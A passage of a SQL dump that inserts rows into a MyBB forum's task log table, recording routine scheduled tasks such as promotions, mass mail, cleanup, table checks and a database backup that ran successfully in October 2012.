promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9690', '9', '1350064544', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9691', '3', '1350064763', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9692', '1', '1350064811', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9693', '7', '1350064813', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9694', '5', '1350065190', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9695', '9', '1350065527', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9696', '5', '1350066907', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9697', '9', '1350066966', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9698', '3', '1350067112', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9699', '9', '1350067285', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9700', '5', '1350067502', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9701', '9', '1350068175', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9702', '3', '1350068353', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9703', '1', '1350068428', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9704', '7', '1350068430', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9705', '5', '1350068822', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9706', '9', '1350069429', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9707', '5', '1350070593', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9708', '9', '1350070614', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9709', '3', '1350071122', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9710', '9', '1350071298', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9711', '5', '1350071361', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9712', '9', '1350071777', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9713', '3', '1350071945', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9714', '1', '1350072365', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9715', '7', '1350072378', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9716', '5', '1350072438', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9717', '9', '1350074344', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9718', '5', '1350074423', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9719', '3', '1350074431', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9720', '9', '1350074444', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9721', '5', '1350075031', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9722', '9', '1350076332', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9723', '3', '1350077589', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9724', '1', '1350077711', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9725', '7', '1350077713', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9726', '5', '1350077718', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9727', '9', '1350077985', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9728', '9', '1350078005', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9729', '5', '1350078310', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9730', '9', '1350079048', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9731', '3', '1350079148', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9732', '1', '1350079236', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9733', '7', '1350079307', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9734', '5', '1350079511', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9735', '9', '1350080230', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9736', '5', '1350080760', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9737', '9', '1350080798', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9738', '3', '1350081770', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9739', '9', '1350082395', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9740', '5', '1350082422', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9741', '9', '1350085647', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9742', '3', '1350085652', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9743', '1', '1350085666', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9744', '7', '1350085718', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9745', '5', '1350085921', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9746', '9', '1350086244', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9747', '3', '1350086349', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9748', '1', '1350086488', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9749', '2', '1350086489', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9750', '7', '1350086492', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9751', '11', '1350086495', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9752', '5', '1350087122', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9753', '9', '1350087716', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9754', '5', '1350088124', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9755', '9', '1350088749', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9756', '3', '1350088784', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9757', '9', '1350089686', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9758', '5', '1350090211', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9759', '9', '1350090796', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9760', '3', '1350090814', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9761', '1', '1350091103', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9762', '7', '1350091225', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9763', '5', '1350091235', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9764', '5', '1350091543', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9765', '9', '1350091972', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9766', '3', '1350092024', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9767', '9', '1350092498', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9768', '5', '1350092702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9769', '9', '1350093359', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9770', '3', '1350093545', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9771', '1', '1350093601', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9772', '7', '1350093602', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9773', '5', '1350093926', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9774', '9', '1350094233', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9775', '5', '1350095140', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9776', '9', '1350095163', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9777', '3', '1350095484', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9778', '9', '1350096074', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9779', '5', '1350096313', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9780', '9', '1350096960', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9781', '3', '1350097164', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9782', '1', '1350097299', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9783', '7', '1350097523', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9784', '5', '1350097547', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9785', '9', '1350098006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9786', '5', '1350098762', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9787', '9', '1350098796', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9788', '3', '1350099019', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9789', '9', '1350099638', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9790', '5', '1350099912', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9791', '9', '1350100560', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9792', '3', '1350100784', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9793', '1', '1350100804', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9794', '7', '1350100818', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9795', '5', '1350101183', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9796', '9', '1350101460', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9797', '5', '1350102323', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9798', '9', '1350102345', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9799', '3', '1350102617', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9800', '9', '1350103262', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9801', '5', '1350103582', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9802', '9', '1350105020', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9803', '3', '1350105068', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9804', '1', '1350105083', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9805', '7', '1350105092', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9806', '5', '1350106153', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9807', '9', '1350107131', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9808', '3', '1350108279', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9809', '5', '1350108294', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9810', '9', '1350108310', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9811', '1', '1350109536', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9812', '7', '1350109675', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9813', '5', '1350109683', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9814', '9', '1350109763', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9815', '3', '1350110353', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9816', '9', '1350110633', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9817', '5', '1350111023', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9818', '9', '1350111335', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9819', '3', '1350111597', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9820', '1', '1350111610', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9821', '7', '1350111703', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9822', '5', '1350111914', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9823', '9', '1350112365', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9824', '5', '1350113108', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9825', '9', '1350113120', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9826', '3', '1350113422', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9827', '9', '1350114060', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9828', '5', '1350114331', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9829', '9', '1350115484', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9830', '3', '1350115491', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9831', '1', '1350115502', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9832', '7', '1350115512', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9833', '5', '1350115554', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9834', '9', '1350115830', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9835', '5', '1350116706', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9836', '9', '1350116733', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9837', '3', '1350117049', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9838', '9', '1350117973', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9839', '5', '1350117989', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9840', '9', '1350118535', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9841', '3', '1350118996', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9842', '1', '1350119004', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9843', '7', '1350119014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9844', '5', '1350119123', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9845', '9', '1350119449', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9846', '5', '1350120345', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9847', '9', '1350120380', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9848', '3', '1350120609', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9849', '9', '1350121248', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9850', '5', '1350121503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9851', '9', '1350122112', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9852', '3', '1350122547', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9853', '1', '1350122552', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9854', '7', '1350122563', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9855', '5', '1350122812', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9856', '9', '1350123694', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9857', '5', '1350124021', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9858', '9', '1350124031', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9859', '3', '1350124203', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9860', '9', '1350124815', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9861', '5', '1350125103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9862', '9', '1350125707', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9863', '3', '1350126012', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9864', '1', '1350126026', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9865', '7', '1350126223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9866', '5', '1350126341', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9867', '9', '1350126675', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9868', '5', '1350127507', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9869', '9', '1350127532', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9870', '3', '1350127888', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9871', '9', '1350128810', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9872', '5', '1350128896', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9873', '9', '1350129428', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9874', '3', '1350129615', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9875', '1', '1350129636', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9876', '4', '1350129640', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9877', '7', '1350129723', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9878', '5', '1350129940', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9879', '9', '1350130375', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9880', '5', '1350131303', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9881', '9', '1350131525', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9882', '3', '1350131533', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9883', '9', '1350132008', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9884', '5', '1350132307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9885', '9', '1350132980', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9886', '3', '1350133181', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9887', '1', '1350133294', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9888', '7', '1350133301', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9889', '5', '1350133909', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9890', '9', '1350133937', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9891', '5', '1350134829', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9892', '9', '1350134860', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9893', '3', '1350135413', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9894', '9', '1350135618', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9895', '5', '1350136509', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9896', '9', '1350137100', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9897', '3', '1350137105', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9898', '1', '1350137118', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9899', '7', '1350137119', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9900', '5', '1350137122', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9901', '9', '1350137580', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9902', '5', '1350139966', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9903', '9', '1350139984', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9904', '3', '1350139995', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9905', '9', '1350140111', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9906', '3', '1350142043', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9907', '1', '1350142048', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9908', '7', '1350142051', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9909', '5', '1350142177', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9910', '9', '1350142225', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9911', '3', '1350142871', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9912', '9', '1350143266', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9913', '5', '1350143271', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9914', '9', '1350143827', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9915', '3', '1350144031', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9916', '1', '1350144034', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9917', '7', '1350144037', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9918', '5', '1350144307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9919', '9', '1350144873', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9920', '5', '1350145763', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9921', '9', '1350145773', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9922', '3', '1350145801', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9923', '9', '1350147554', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9924', '5', '1350147843', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9925', '3', '1350147852', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9926', '1', '1350147870', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9927', '7', '1350147898', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9928', '5', '1350147902', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9929', '9', '1350148299', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9930', '5', '1350149428', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9931', '9', '1350149473', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9932', '3', '1350149481', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9933', '9', '1350150475', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9934', '5', '1350150482', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9935', '9', '1350150920', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9936', '3', '1350151243', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9937', '1', '1350151246', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9938', '7', '1350151248', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9939', '5', '1350151502', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9940', '9', '1350151819', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9941', '5', '1350152740', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9942', '9', '1350152745', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9943', '3', '1350153001', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9944', '9', '1350153619', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9945', '5', '1350153906', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9946', '9', '1350154508', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9947', '3', '1350154969', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9948', '1', '1350154972', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9949', '7', '1350154976', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9950', '5', '1350155151', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9951', '9', '1350155495', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9952', '5', '1350156307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9953', '9', '1350156312', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9954', '3', '1350156655', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9955', '9', '1350157204', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9956', '5', '1350157528', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9957', '9', '1350158153', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9958', '3', '1350158869', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9959', '1', '1350158874', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9960', '7', '1350158899', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9961', '5', '1350158911', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9962', '9', '1350159026', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9963', '5', '1350160313', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9964', '9', '1350160327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9965', '3', '1350160416', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9966', '9', '1350160857', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9967', '5', '1350162416', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9968', '9', '1350162735', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9969', '3', '1350162766', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9970', '1', '1350162799', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9971', '7', '1350162806', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9972', '5', '1350163512', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9973', '9', '1350163543', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9974', '3', '1350163811', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9975', '9', '1350164442', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9976', '5', '1350164702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9977', '9', '1350165318', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9978', '3', '1350165549', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9979', '1', '1350165604', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9980', '7', '1350165625', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9981', '5', '1350165923', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9982', '9', '1350166535', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9983', '5', '1350167105', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9984', '9', '1350167145', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9985', '3', '1350167601', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9986', '9', '1350168145', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9987', '5', '1350168574', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9988', '9', '1350169013', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9989', '3', '1350169180', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9990', '1', '1350169215', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9991', '7', '1350169231', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9992', '5', '1350169521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9993', '9', '1350169811', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9994', '5', '1350170708', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9995', '9', '1350170728', 'The mass mail 